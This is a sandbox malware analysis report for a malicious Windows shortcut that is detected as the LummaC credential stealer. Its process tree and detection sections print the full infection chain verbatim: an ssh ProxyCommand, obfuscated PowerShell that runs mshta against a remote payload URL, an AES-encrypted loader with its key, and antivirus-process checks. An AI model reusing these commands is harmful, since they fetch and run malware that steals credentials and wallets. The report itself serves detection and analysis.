Edit tour

Windows Analysis Report
JSWunwO4rS.lnk

Overview

General Information

Sample name:	JSWunwO4rS.lnk renamed because original name is a hash value
Original sample name:	624101f6b4285e2425c8851c2350d787.lnk
Analysis ID:	1570112
MD5:	624101f6b4285e2425c8851c2350d787
SHA1:	bd1c79428041143f49cb695cd947f4448540d5c9
SHA256:	cb99077ec6936521cec13989456a3d87a275fb2a3508f67b624805bba5d26ef3
Tags:	lnkuser-abuse_ch
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected LummaC Stealer

AI detected suspicious sample

Drops PE files with a suspicious file extension

Machine Learning detection for sample

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Lolbin Ssh.exe Use As Proxy

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

ssh.exe (PID: 2780 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)

conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6660 cmdline: powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']') MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://wserdtfyguhij.2024-vipticket.com/k.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 1088 cmdline: "C:\Windows\system32\mshta.exe" https://wserdtfyguhij.2024-vipticket.com/k.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

IntroductoryTunes.exe (PID: 3924 cmdline: "C:\Users\user\AppData\Roaming\IntroductoryTunes.exe" MD5: 12B325F869EA3948FD7ADDBCD59AAC1C)

cmd.exe (PID: 5356 cmdline: "C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7184 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7192 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7228 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7236 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7276 cmdline: cmd /c md 136140 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7292 cmdline: findstr /V "DEALERPICRESPONDEDCOURAGEPREREQUISITEOLYMPUSDIAGRAMENGAGED" Sunny MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7304 cmdline: cmd /c copy /b ..\Steady + ..\Ts + ..\Unnecessary + ..\Minutes + ..\Silk + ..\Contents + ..\Global d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Concerts.com (PID: 7320 cmdline: Concerts.com d MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

choice.exe (PID: 7336 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

svchost.exe (PID: 6768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 7056	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x7d224:$b1: ::WriteAllBytes( 0x7d6ea:$b1: ::WriteAllBytes( 0x8b:$s1: -join 0x3f8bd:$s1: -join 0x4001d:$s1: -join 0x4b93f:$s1: -join 0x59795:$s1: -join 0x59ff8:$s1: -join 0x5af91:$s1: -join 0x6391e:$s1: -join 0x7d2d6:$s1: -join 0x7d79c:$s1: -join 0x9189f:$s1: -join 0x9ca61:$s1: -join 0x9ca9c:$s1: -join 0x9cb63:$s1: -join 0x9cb91:$s1: -join 0x9cd41:$s1: -join 0x9cd64:$s1: -join 0x9d017:$s1: -join 0x9d038:$s1: -join

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://wserdtfyguhij.2024-vipticket.com/k.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://wserdtfyguhij.2024-vipticket.com/k.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://wserdtfyguhij.2024-vipticket.com/k.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://wserdtfyguhij.2024-vipticket.com/k.mp4, ProcessId: 1088, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4B

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4B

Sigma detected: Lolbin Ssh.exe Use As Proxy

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" ., ProcessId: 2780, ProcessName: ssh.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7056, TargetFilename: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\IntroductoryTunes.exe" , ParentImage: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe, ParentProcessId: 3924, ParentProcessName: IntroductoryTunes.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd, ProcessId: 5356, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']'), CommandLine: powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 2780, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']'), ProcessId: 6660, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4B

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6768, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5356, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7236, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
